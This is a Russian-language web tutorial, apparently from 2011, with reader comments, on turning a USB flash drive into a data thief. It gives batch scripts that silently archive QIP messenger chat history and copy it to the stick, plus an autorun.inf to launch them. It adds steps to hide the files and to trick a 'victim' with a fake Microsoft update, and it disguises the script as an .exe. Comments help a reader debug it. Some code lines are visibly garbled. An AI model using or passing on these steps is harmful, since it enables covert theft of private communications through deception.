Флешка - вор. Пишем .bat-файл с автозапуском

 

Вирус на флешке

 

 Батник - это обычный тексто­вый файл, содержащий наборы команд интерпретатора и имею­щий расширение .bat или .cmd! (.cmd работают только в ОС се­мейства NT). Редактировать та­кие файлы можно при помощи блокнота "Или любого другого текстового редактора.

 

Пишем батник

Создавать,батник будем для второй ситуации (она не­много сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:

 

@Echo off

c:

chdir C:\Program Files\QIP\Users

f:\rar.exe a -r users -r > nul

copy users.rar g:\adc > nul

del users.rar > nul

 

где


©Echo off - скрывает ви­зуальный процесс копиро­вания.

C:\Program  Files\QIP\Users - папка, в которой находится история.

f:\rar.exe а -г users > nul -запуск архиватора для ус­корения копирования.

copy users.rar g:\adc > nul - адрес куда копируем.

del users.rar > nul - удаляет созданный архив на жеском диске.

 

 Не всегда бывает известна бук­ва флеш-диска. В "таком случае прописываем несколько вариан­тов (один уж точно угадаем):

 

@Echo off

с:

chdit C:\Program Files\QIP\Users

f:\rar.exe  а -г users > nul

copy users.rar e:\abc > nul

 g:\rar.exe a -r users > nul

copy users.rar g:\abc > nul

h:\rar.exe a -r users > nul

copy users.rar h:\abc > nul

del users-rar > nul

 Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расши­рение c .txt нa .bat. Это мож­но сделать в Total Commander'e.

 

Создаем автозапуск

Теперь надо сделать так, что­бы батник автоматически запускался с флешки при под­ключении к компьютеру. Для это­го создаём новый текстовый до­кумент и пишем в нём:

 

[autorun]

ShellExeCute="xxx.bat"

Сохраняем файл и переимено­вываем его на autorun.inf.

 

Делаем архив

 Далее нам предстоит позабо­тится об архиваторе. QIP-история может быть большая. Что­бы процесс копирования происхо­дил быстрее мы её заархивируем.

 

 Из папки с WinRAR (по умолча­нию C:\Program Files\WinRAR бе­рём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бро­саем остальные три файла (xxx.bat, autorun.inf, rar.exe).

 

 Все файлы скрываем от посто­ронних глаз (правой кнопкой мы­ши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку "жертве" и ждём результата.

 

Социальная инженерия

 Не обязательно делать авто­запуск. "Жертва" сама мо­жет запустить батник. Для этого надо воспользоваться социаль­ной инженерией. Например, со­общаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстро­действие и без­опасность опера­ционной системы. Устанавливать об­новление нужно то­лько с флешки. Можете сами придумать причи­ну, по которой на­до запустить наш батник. Всё зави­сит от вашей фан­тазии и смекалки.

 

Превращаем .bat в .exe

 Для большей "безопаснос­ти" neperoним .bat в .ехе (вдруг"жертва" знакома с напи­санием батников). В этом нам поможет небольшая програм­мка ExeScript v3.0.

 

 

 

 Скачать можноэдесь:  http://uploadbox.com/fMes/c8d5a60af9/ (размер 3.51. Мб).  В окне программы жмём иконку с чистым листом и выбираем Batch file (bat) или File > New > Batch file (bat). В по­явившемся окне пишем наш "текст".

 

 Теперь укажем для на­шего ехе-шника подхо­дящую иконку. В окне Properties щёлкаем на поле Custom Icon и вы­бираем заранееприготовленную иконку. Далее нажима­ем F7 или Project > Build. Всё, ехе-шник готов.

 

 

 


Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
as43 3 января 2011 16:55
а что он ворует ???
admin 3 января 2011 17:08
любой файл который укажешь в батнике. Конкретно в этом случае папку с историей аськи
Александр 17 февраля 2011 22:45
Подскажите пожалуйста что у меня не так в коде?
Флешка в Оси под буквой !"J"
бат файл:
@Echo off
c:
chdir C:\mmm
J:\rar.exe a -r users > nul
copy users.rar J:\abc > nul
del users.rar > nul
Папку mmm не копирует в abc на флешку.Даже когда bat файл запускаю с флешки вручную.
операционка у меня: win7.
Все четыре файла закинул на флешку как и написано. В чем дело подскажите пожалуйста.
admin 18 февраля 2011 20:43
Цитата: Александр
@Echo off

Прежде всего попробуй убрать из файла @Echo off, тогда сможеш видеть что пргоисходит, а на каком диске винда стоит? мб с правами администратора косяк.
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.